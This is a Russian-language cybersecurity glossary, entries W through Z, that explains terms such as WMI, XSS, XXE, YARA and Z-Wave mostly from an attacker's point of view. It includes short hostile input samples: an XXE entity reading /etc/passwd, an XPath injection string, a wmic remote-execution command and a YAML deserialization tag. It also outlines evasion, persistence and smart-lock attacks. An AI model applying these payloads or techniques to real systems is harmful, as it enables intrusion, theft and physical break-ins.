Wireshark Сниффер (анализатор сетевого трафика). Wireshark используется для: анализа C2-коммуникаций, поиска паролей в незашифрованном трафике, отладки. Для атакующего Wireshark инструмент для изучения сети жертвы (если есть доступ).

WLAN (Wireless LAN) Беспроводная локальная сеть (Wi-Fi). См. Wi-Fi.

WMI (Windows Management Instrumentation) Инфраструктура управления Windows (WMI). WMI используется для: сбора информации о системе (Win32_Process, Win32_Service), удаленного выполнения команд, persistence (WMI Event Subscription), lateral movement. WMI работает через RPC (порт 135). Атакующие используют WMI для: выполнения команд (wmic process call create), сбора данных, создания скрытых backdoor (WMI Event Subscription). WMI редко логируется, что делает его привлекательным.

WMI Event Subscription Подписка на события WMI для выполнения действий при наступлении условия (запуск процесса, вход пользователя). Используется для persistence: при каждом запуске определенного приложения или входе пользователя выполняется вредоносный скрипт. WMI Event Subscription сложно обнаружить и удалить.

WMI Filter Фильтр WMI, используемый в групповых политиках (GPO) для применения политик только к определенным системам. Атакующий может модифицировать WMI Filter для развертывания малвари на целевых системах.

WMI Query Language (WQL) Язык запросов WMI (аналог SQL). WQL используется для выборки данных о системе (например, SELECT * FROM Win32_Process WHERE Name='cmd.exe'). Атакующие используют WQL для энумерации.

WMS (Warehouse Management System) Система управления складом. WMS цель для disruption: нарушение работы склада может остановить бизнес. Атаки на WMS через ERP-интеграции.

Word (Microsoft Word) Текстовый процессор, входящий в Microsoft Office. Word классический вектор для: макросов (VBA), фишинга (вредоносные вложения), уязвимостей (CVE-2017-11882). В 2026 макросы отключены по умолчанию, но атакующие используют другие методы (ClickFix, HTML smuggling).

WordPress CMS (Content Management System) с открытым кодом, популярная для сайтов. WordPress уязвим к: SQL injection (через плагины), XSS, RCE (через уязвимости ядра), брутфорсу (wp-login). Для атакующего WordPress легкая цель, если не обновляется. Web shell на PHP распространенный backdoor.

WPA (Wi-Fi Protected Access) См. Wi-Fi Protected Access. Wi-Fi Protected Access (WPA) протокол защиты Wi-Fi. WPA2 (AES) уязвим к KRACK (CVE-2017-13077). WPA3 (SAE) устойчивее к offline-атакам. Для атакующего взлом WPA/WPA2 требует захвата handshake и offline-брутфорса (Hashcat).

WPA2 Протокол защиты Wi-Fi, использующий AES (CCMP). Уязвим к KRACK (CVE-2017-13077). В 2026 WPA2 все еще широко используется, особенно в корпоративных сетях, но рекомендуется переход на WPA3.

WPA3 Протокол защиты Wi-Fi, использующий SAE (Simultaneous Authentication of Equals) вместо PSK, обеспечивающий устойчивость к offline-атакам. Уязвимости WPA3 (dragonblood) исправлены в обновлениях. Для атакующего WPA3 сложнее взломать, чем WPA2.

WPS (Wi-Fi Protected Setup) Протокол упрощенной настройки Wi-Fi (PIN, кнопка). WPS уязвим к брутфорсу PIN (8 цифр, последняя контрольная сумма, 11,000 комбинаций). Инструменты: reaver, bully. Для атакующего WPS способ взлома WPA/WPA2 за часы.

WQL (WMI Query Language) Язык запросов WMI (WMI Query Language), аналог SQL для WMI. WQL используется для выборки данных о системе (например, SELECT * FROM Win32_Process WHERE Name='cmd.exe'). Атакующие используют WQL для энумерации (список процессов, служб, пользователей), создания событий (WMI Event Subscription).

WRK (Windows Research Kernel) Исходный код ядра Windows (устаревший). Для атакующего WRK источник информации о внутренностях Windows (структуры, системные вызовы), что помогает в разработке эксплойтов.

WS-Discovery (Web Services Dynamic Discovery) Протокол обнаружения устройств (используется в принтерах, камерах, IoT). WS-Discovery может быть использован для DDoS-амплификации (аналогично SSDP). Для атакующего WS-Discovery вектор для отраженных DDoS-атак.

WS-Management (WS-Man) Протокол удаленного управления (WinRM). WS-Man используется для PowerShell Remoting. Атакующие используют WS-Man для lateral movement.

WSA (Windows Subsystem for Android) Подсистема Android в Windows (Android-приложения на Windows). WSA может быть использован для запуска Android-малвари на Windows.

WSH (Windows Script Host) Среда выполнения скриптов Windows (Windows Script Host). WSH поддерживает VBScript (VBS) и JScript (JS). Используется для: запуска скриптов (cscript.exe, wscript.exe), автоматизации. Атакующие используют WSH для выполнения малвари (например, через .vbs файлы).

WSL (Windows Subsystem for Linux) Подсистема Windows для запуска Linux-бинарников (Windows Subsystem for Linux). WSL может быть использован для: запуска Linux-инструментов на Windows (nmap, Metasploit), C2, persistence. Для атакующего WSL способ использовать Linux-инструменты без VM.

WSUS (Windows Server Update Services) Служба централизованного обновления Windows в корпоративной среде. WSUS цель для supply chain атак: компрометация WSUS позволяет распространять вредоносные обновления на все компьютеры в домене. Используется для массового развертывания малвари.

WYSIWYG (What You See Is What You Get) Редакторы визуального редактирования (WYSIWYG). В контексте атак WYSIWYG-редакторы могут иметь уязвимости (XSS, HTML injection), если не экранируют ввод.

X

X.25 Устаревший протокол пакетной коммутации (1970-80-е). В 2026 встречается в legacy-системах (банковские сети, платежные терминалы). Атаки на X.25: перехват пакетов, подмена адресов.

X.400 Устаревший стандарт электронной почты (альтернатива SMTP). В 2026 встречается в legacy-системах (правительственные, военные сети).

X.500 Стандарт служб каталогов (предшественник LDAP). Используется в некоторых legacy-системах.

X.509 Стандарт ITU-T для цифровых сертификатов, используемый в TLS/SSL, S/MIME, коде подписи. Сертификат X.509 содержит: версию, серийный номер, субъект (владелец), издатель (CA), публичный ключ, срок действия, подпись. Для атакующего X.509 важен: кража приватного ключа сертификата позволяет расшифровывать TLS-трафик, подписывать малварь (code signing), выдавать себя за легитимный сервис. Уязвимости: слабые алгоритмы хэширования (MD5, SHA1), неправильная валидация цепочки.

X.509 Certificate См. X.509. X.509 стандарт для цифровых сертификатов, используемый в TLS/SSL, S/MIME, подписи кода. Сертификат X.509 содержит: версию, серийный номер, субъект (владелец), издатель (CA), публичный ключ, срок действия, подпись. Для атакующего X.509 важен: кража приватного ключа сертификата позволяет расшифровывать TLS-трафик, подписывать малварь (code signing), выдавать себя за легитимный сервис.

XAML (eXtensible Application Markup Language) Язык разметки для UI в .NET (WPF, UWP, MAUI). XAML может содержать вредоносный код (например, ссылки на ресурсы). Уязвимости XAML могут привести к выполнению кода (deserialization).

Xbox Игровая консоль Microsoft. Xbox цель для: взлома (jailbreak), кражи учетных записей, DDoS-атак на игроков (swatting). В контексте атак Xbox также может быть использован как платформа для C2 (игровой трафик).

Xcode Среда разработки для Apple (iOS, macOS). XcodeGhost (2015) атака на цепочку поставок: вредоносная версия Xcode распространялась через китайские CDN, внедряя backdoor в приложения, собранные с ней. Для атакующего Xcode вектор supply chain атаки на iOS/macOS приложения.

XcodeGhost Вредоносная модификация Xcode, распространявшаяся через неофициальные каналы. Приложения, скомпилированные с XcodeGhost, отправляли данные на C2. В 2026 XcodeGhost пример supply chain атаки на среду разработки.

XDCC (Xabi DCC) Протокол передачи файлов через IRC. Используется в пиринговых сетях для распространения малвари, в том числе инфостилеров. Для атакующего XDCC канал распространения.

XDP (eXpress Data Path) Технология в ядре Linux для высокопроизводительной обработки пакетов на уровне драйвера. XDP используется для DDoS-защиты, фильтрации. Для атакующего XDP может быть использован для сокрытия C2-трафика (eBPF/XDP программы).

XDR (Extended Detection and Response) Расширенное обнаружение и реагирование класс продуктов, объединяющих EDR, NDR, SIEM, аналитику облака. Примеры: Microsoft 365 Defender, Palo Alto Cortex XDR, Trend Micro Vision One. XDR собирает телеметрию с разных уровней (endpoint, сеть, облако) для корреляции атак. Для атакующего XDR серьезный противник, требующий evasion на нескольких уровнях одновременно.

XDR (Extended Detection and Response) Evasion Обход XDR (Extended Detection and Response) техники, позволяющие атакующему оставаться незамеченным для систем, собирающих телеметрию с нескольких уровней. Включает: direct syscalls (обход хуков EDR), шифрование трафика (обход NDR), имитацию легитимного поведения (behavioral blending), использование легитимных инструментов (LOLBins). Handala использовала Intune (легитимная платформа) для атаки, обходя XDR.

Xen Гипервизор с открытым кодом, используемый в AWS, многих cloud-средах. Xen цель для VM escape (уязвимости в Xen). Для атакующего Xen поверхность атаки в облачных средах.

XenServer Платформа виртуализации на базе Xen (Citrix). Атаки на XenServer: VM escape, компрометация management interface.

XFF (X-Forwarded-For) HTTP-заголовок, указывающий исходный IP-адрес клиента при прохождении через прокси/балансировщик. XFF может быть подделан атакующим для обхода IP-фильтров, атак на основе IP (rate limiting). Для атакующего XFF инструмент для маскировки IP (spoofing) и обхода geoblocking.

XHTML (Extensible HyperText Markup Language) Расширение HTML, соответствующее XML. Уязвимости XHTML: XSS (Cross-Site Scripting), инъекции.

XIB (XML Interface Builder) Формат файлов для UI в iOS/macOS (Interface Builder). XIB-файлы могут содержать вредоносный код или ссылки на ресурсы. Атаки через XIB: инъекции.

XKMS (XML Key Management Specification) Спецификация управления ключами на основе XML (XML Key Management Specification). Используется для регистрации и управления криптографическими ключами в веб-сервисах. В контексте атак XKMS может быть целью для атак на PKI (Public Key Infrastructure), если используется в корпоративных системах. Не является ключевым термином.

XML (eXtensible Markup Language) Язык разметки, используемый для обмена данными (SOAP, RSS, конфигурации). Уязвимости XML: XXE (XML External Entity), XPath injection, Billion Laughs (DoS). XML-парсеры часто имеют уязвимости десериализации.

XML External Entity (XXE) Уязвимость XML-парсеров, позволяющая читать локальные файлы (file://), выполнять запросы к внутренним сервисам (SSRF), вызывать DoS (Billion Laughs). XXE возникает, когда парсер разрешает внешние сущности. Пример: <!ENTITY xxe SYSTEM "file:///etc/passwd">. Для атакующего XXE способ кражи файлов конфигурации, внутренней разведки.

XMPP (Extensible Messaging and Presence Protocol) Протокол обмена сообщениями (Jabber). XMPP используется для: C2 (скрытая коммуникация), ботнетов. Трафик XMPP может маскироваться под легитимный мессенджер.

XOR (Exclusive OR) Логическая операция, используемая в криптографии для простого шифрования (XOR cipher). В малвари XOR часто используется для обфускации строк (ключа), шифрования C2-коммуникаций, упаковки (packing). XOR легко дешифруется при наличии образца, но усложняет статический анализ.

XOR Cipher Симметричный шифр, использующий операцию XOR с ключом. Простой, быстрый, но слабый (легко взламывается при повторном использовании ключа). Используется в малвари для обфускации строк, конфигураций, C2-адресов. Пример: decoded = encoded ^ key.

XPath Язык запросов к XML-документам. XPath injection уязвимость, позволяющая модифицировать запрос для обхода аутентификации или извлечения данных. Аналогична SQL injection.

XPath Injection Внедрение кода в XPath-запрос. Пример: ' or '1'='1. Используется для обхода аутентификации (логин без пароля), извлечения данных. Встречается в веб-приложениях, использующих XML-базы данных (например, конфигурации).

XSD (XML Schema Definition) Язык описания структуры XML-документов. Уязвимости XSD: XXE, DoS.

XSS (Cross-Site Scripting) Уязвимость, позволяющая злоумышленнику внедрить JavaScript-код в веб-страницу, выполняемый в браузере жертвы. Типы: reflected XSS (скрипт в параметре URL), stored XSS (скрипт сохраняется в базе данных), DOM-based XSS (манипуляция DOM). XSS используется для: кражи cookies (session hijacking), выполнения действий от имени пользователя, фишинга, распространения малвари. Защита: экранирование вывода, Content Security Policy (CSP).

XSS Auditor Механизм защиты от XSS в браузерах (Chrome, Safari). XSS Auditor пытается блокировать выполнение скриптов, которые были отражены в ответе. В 2026 заменен CSP и Trusted Types.

XSS Filter Фильтры XSS на стороне сервера (WAF) или браузера. Для атакующего XSS фильтры препятствие, обходимое через обфускацию, кодирование, использование событий (onerror, onload), DOM-манипуляции.

XST (Cross-Site Tracing) Уязвимость, использующая метод HTTP TRACE (или TRACK) для кражи cookies. Если TRACE включен, XST позволяет обойти флаг HttpOnly. В 2026 TRACE отключен по умолчанию.

XUL (XML User Interface Language) Язык разметки интерфейсов в Firefox (дополнения, приложения). XUL может содержать вредоносный код. Уязвимости XUL приводили к RCE.

Y

YAML (YAML Ain't Markup Language) Формат сериализации данных (используется в конфигурациях Kubernetes, Ansible, CI/CD). Уязвимости YAML: десериализация (в некоторых парсерах YAML может выполнять произвольный код). Для атакующего YAML вектор supply chain атаки через конфигурации CI/CD.

YAML Anchor Механизм YAML для повторного использования данных (якоря). Уязвимости: рекурсивные ссылки могут привести к DoS (billion laughs аналогия).

YAML Front Matter Блок YAML в начале файлов (Markdown, Jekyll). Используется в веб-приложениях для метаданных. Уязвимости: инъекции (если данные не экранируются).

YAML Injection Внедрение кода в YAML-парсер. Некоторые YAML-парсеры (например, в Ruby, Python) позволяют выполнять произвольный код при десериализации (например, !!ruby/object). YAML injection используется для RCE в приложениях, обрабатывающих пользовательский YAML.

YARA Инструмент с открытым кодом для создания правил (правил YARA) для идентификации и классификации вредоносного ПО по текстовым или бинарным паттернам. Правила YARA используются защитниками для: обнаружения малвари (в файлах, памяти, трафике), классификации образцов, создания IoC (Indicators of Compromise). Для атакующего YARA угроза: его малварь может быть обнаружена YARA-правилами, если не использует обфускацию, полиморфизм, или не попадает под известные паттерны. Атакующие изучают публичные YARA-правила, чтобы модифицировать малварь для обхода.

YARA Rule Правило YARA набор условий (строк, байтовых последовательностей, регулярных выражений) для обнаружения вредоносного ПО. Пример: rule Malware_Example { strings: $a = "evil.exe" condition: $a }. Правила YARA могут быть очень сложными (с условиями, весами). Для атакующего публичные YARA-правила источник информации о том, как его малварь детектится.

YARA-L Расширение YARA для анализа логов (Google Chronicle). YARA-L используется для обнаружения угроз в логах (SIEM). Для атакующего YARA-L означает, что даже в логах могут быть паттерны, детектирующие его активность.

YARA-Rules (Project) Коллекции YARA-правил, публикуемые исследователями (Neo23x0/signature-base, ReversingLabs). Используются защитниками для обнаружения малвари. Для атакующего эти коллекции источник информации о том, какие паттерны детектятся.

YARA-X Следующее поколение YARA (более быстрая реализация на Rust). Для атакующего YARA-X означает, что защитники получат более производительный инструмент для обнаружения.

Yarn Менеджер пакетов для JavaScript (альтернатива npm). Yarn цель supply chain атак: публикация вредоносных пакетов в репозиторий (typosquatting), компрометация легитимных пакетов. Разработчики, устанавливающие пакеты через Yarn, могут получить малварь.

Yelp Платформа отзывов. В контексте атак Yelp может быть использован для OSINT (информация о бизнесе, сотрудниках). Не является ключевым термином.

Yggdrasil Децентрализованная сеть, альтернатива Tor, использующая IPv6. Yggdrasil может быть использован для C2, анонимной коммуникации. В 2026 встречается, но реже, чем Tor.

Yocto Project Проект для создания кастомных Linux-дистрибутивов для embedded-систем (IoT, промышленные контроллеры). Yocto цель для supply chain атак: компрометация сборки (build server) может внедрить backdoor в прошивки тысяч устройств.

Yogosha Платформа bug bounty (аналогично HackerOne, Bugcrowd). Для атакующего Yogosha источник информации об уязвимостях (disclosure timeline). Не является ключевым термином.

YOLO (You Only Look Once) Алгоритм обнаружения объектов в реальном времени, используемый в AI/компьютерном зрении. YOLO может быть использован для обхода CAPTCHA (распознавание объектов на изображениях), а также для сбора информации (распознавание лиц, документов). Для атакующего YOLO инструмент для автоматизации обхода визуальных защит.

YSM (YARA Shellcode Module) Модуль YARA для анализа shellcode (последовательностей байт). Используется для обнаружения shellcode в памяти (in-memory attacks). Для атакующего YSM угроза: его memory-only payload может быть обнаружен, если использует известные shellcode-паттерны.

YubiHSM Аппаратный модуль безопасности (HSM) от Yubico, предназначенный для защиты ключей (криптография). YubiHSM используется для хранения корневых ключей, сертификатов. Для атакующего YubiHSM препятствие: ключи не могут быть извлечены программно, только физическая атака.

YubiKey Аппаратный ключ безопасности (FIDO2, U2F, OTP), используемый для двухфакторной аутентификации (2FA) и безнарольного входа (passwordless). YubiKey устойчив к фишингу (AiTM), потому что подпись привязана к конкретному домену. Для атакующего YubiKey препятствие: обход требует физического доступа к ключу, уязвимостей в реализации (side-channel), или атаки на helpdesk (сброс MFA). В корпоративной среде YubiKey используется для защиты привилегированных учетных записей.

YUM (Yellowdog Updater Modified) Менеджер пакетов в RPM-based Linux (Red Hat, CentOS, Fedora). YUM цель для supply chain атак: компрометация репозитория (или MITM) может привести к установке вредоносных пакетов. YUM подписывает пакеты GPG-ключами; если проверка подписи отключена, возможна инъекция.

YYYY-MM-DD Формат даты (ISO 8601). В логах, в DGA (Domain Generation Algorithm) используется дата как seed. Понимание формата помогает в предсказании DGA-доменов.

Z

Z-Wave Протокол беспроводной связи для домашней автоматизации (умные замки, датчики, термостаты). Z-Wave использует диапазон 800-900 МГц. Атаки на Z-Wave: перехват и дешифровка (слабый шифр), подмена команд, DoS. Для атакующего Z-Wave вектор для физического пентеста (взлом умных замков, отключение сигнализаций).

Z-Wave Alliance Организация, управляющая стандартом Z-Wave (Z-Wave Alliance). Устанавливает спецификации, сертифицирует устройства. В контексте атак Z-Wave Alliance не является термином, но упоминается в документации по Z-Wave. Для атакующего важно, что устройства, сертифицированные Z-Wave Alliance, соответствуют стандартам безопасности S2.

Z-Wave Analyzer Анализатор Z-Wave трафика (программно-аппаратный). Используется для реверс-инжиниринга протокола, перехвата команд.

Z-Wave Certificate Сертификат безопасности Z-Wave (S2). Используется для аутентификации устройств. Подделка сертификатов может дать атакующему возможность внедрить вредоносное устройство в сеть.

Z-Wave Class Классы устройств Z-Wave (замки, датчики, термостаты). Для атакующего важно знать класс устройства для выбора атаки.

Z-Wave Controller См. Z-Wave Gateway. Z-Wave Gateway (контроллер, хаб) центральное устройство, управляющее сетью Z-Wave. Компрометация шлюза дает контроль над всеми Z-Wave устройствами (замки, датчики, термостаты). Атаки: уязвимости в веб-интерфейсе, default credentials, перехват управления через облако.

Z-Wave Dongle См. Z-Wave Stick. Z-Wave Stick USB-адаптер для подключения Z-Wave сети к компьютеру. Используется для управления Z-Wave устройствами с ПК. Может быть использован атакующим для атак на Z-Wave сети (перехват, отправка команд).

Z-Wave Exclusion Процесс удаления устройства из сети Z-Wave (exclusion). Атакующий может исключить устройство из сети (DoS) или добавить свое устройство.

Z-Wave Frequency Частота Z-Wave: 868.4 МГц (Европа), 908.4 МГц (США), 919.8 МГц (Гонконг). Для глушения (jamming) нужно знать частоту.

Z-Wave Fuzzing Фаззинг Z-Wave стека для поиска уязвимостей (переполнение буфера, DoS). Используется исследователями для обнаружения 0-day в Z-Wave устройствах. Для атакующего результаты фаззинга источник эксплойтов.

Z-Wave Gateway Шлюз Z-Wave (контроллер) центральное устройство, управляющее сетью Z-Wave. Компрометация шлюза дает контроль над всеми Z-Wave устройствами (замки, датчики, термостаты).

Z-Wave Hub См. Z-Wave Gateway.

Z-Wave Inclusion Процесс добавления устройства в сеть Z-Wave (inclusion). Уязвимости в процессе inclusion могут привести к перехвату ключей.

Z-Wave Interference Интерференция (помехи) на частоте Z-Wave. Может использоваться для DoS (глушение).

Z-Wave Jamming Радио-глушение (jam) Z-Wave частоты (800-900 МГц). Используется для DoS (отключение умных устройств), физического проникновения (глушение датчиков движения).

Z-Wave Library Библиотеки для работы с Z-Wave (OpenZWave). Используются в шлюзах, в инструментах для атак. Уязвимости в библиотеках могут привести к RCE.

Z-Wave Light Switch Умный выключатель света. Компрометация может использоваться для создания мерцания (эпилепсия), DoS, отвлечения.

Z-Wave Long Range Версия Z-Wave с увеличенной дальностью (до нескольких километров). Используется в промышленных системах, умных городах.

Z-Wave Malware Вредоносное ПО, нацеленное на Z-Wave шлюзы (например, через уязвимости в веб-интерфейсе). После компрометации может управлять устройствами, отключать сигнализации, открывать двери.

Z-Wave Modulation Модуляция сигнала Z-Wave (FSK Frequency-Shift Keying). В контексте атак модуляция важна для радио-глушения (jamming) и перехвата сигнала. Для атакующего, работающего с Z-Wave, знание модуляции необходимо для выбора оборудования (SDR).

Z-Wave Network Сеть Z-Wave (до 232 устройств). Атака на сеть может привести к компрометации всех устройств в доме/офисе.

Z-Wave Network Key Сетевой ключ Z-Wave, используемый для шифрования коммуникаций. Перехват Network Key (через атаку на процесс pairing) дает атакующему возможность дешифровывать и отправлять команды.

Z-Wave OTAP (Over-The-Air Programming) Функция обновления прошивки Z-Wave устройств по воздуху. Компрометация OTAP позволяет атакующему установить вредоносную прошивку на устройства (уничтожение, ботнет).

Z-Wave Pairing Attack Атака на процесс добавления устройства в сеть Z-Wave (pairing). В процессе обмена ключами может быть перехвачен сетевой ключ (Network Key), что дает атакующему контроль над всей сетью.

Z-wave PC Controller ПО для управления Z-Wave сетью через ПК. Может быть использовано для атак (отправка команд, сканирование).

Z-Wave Plus Усовершенствованная версия Z-Wave (Z-Wave Plus) с улучшенной батареей, дальностью, увеличенной пропускной способностью. В контексте атак Z-Wave Plus может быть более сложной целью из-за улучшенной защиты (S2). Не является ключевым термином, но упоминается в контексте устройств.

Z-Wave Protocol Протокол Z-Wave. Понимание протокола необходимо для разработки атак (fuzzing, реверс-инжиниринг). Имеет открытую спецификацию.

Z-Wave Protocol Stack Стек протоколов Z-Wave. Уязвимости в стеке могут привести к RCE на устройствах.

Z-Wave Region Региональные настройки Z-Wave (частота, мощность). При атаке важно соответствовать региону, чтобы устройства были в диапазоне.

Z-Wave Remote Дистанционное управление Z-Wave сетью через интернет (облачные сервисы). Компрометация облачного аккаунта шлюза дает удаленный доступ к устройствам.

Z-Wave Repeater Устройство-повторитель сигнала Z-Wave. Компрометация повторителя может дать атакующему доступ к трафику всей сети (MITM).

Z-Wave Replay Attack Атака повторного воспроизведения (replay) Z-Wave команд. Злоумышленник перехватывает команду (например, "открыть дверь") и повторяет ее. Z-Wave S2 имеет защиту от replay (nonce, последовательные номера).

Z-Wave S2 (Security 2) Улучшенная версия протокола Z-Wave с шифрованием AES-128. S2 устойчивее к перехвату и подмене. Атаки на S2: атаки на процесс pairing (key exchange), DoS.

Z-Wave Security Уровни безопасности Z-Wave: S0 (старый, слабый), S2 (AES-128), S2 Authenticated (с аутентификацией). S0 уязвим к перехвату. Атакующие ищут сети с S0.

Z-Wave Sensor Датчики Z-Wave (движения, открытия дверей, дыма, протечки). Компрометация датчиков позволяет: отключить сигнализацию (подавить сигнал о движении), создать ложные срабатывания (паника, вызов служб).

Z-Wave Smart Lock Умный замок, управляемый через Z-Wave. Цель для физического пентеста: взлом замка через атаки на протокол (replay, key theft) или физический взлом (сверловка). Handala не атаковала Z-Wave, но в физическом пентесте такие замки цель.

Z-Wave Sniffer Инструмент для перехвата Z-Wave трафика (например, Z-Wave USB-адаптер с модифицированной прошивкой). Используется для анализа протокола, кражи ключей, перехвата команд.

Z-Wave Stick USB-адаптер для подключения Z-Wave сети к компьютеру. Используется для управления Z-Wave устройствами с ПК. Может быть использован атакующим для атак на Z-Wave сети.

Z-Wave Thermostat Умный термостат (управление отоплением, кондиционером). Компрометация может использоваться для DoS (отключение отопления зимой) или для повышения счетов за электроэнергию.

Z-Wave USB См. Z-Wave Stick.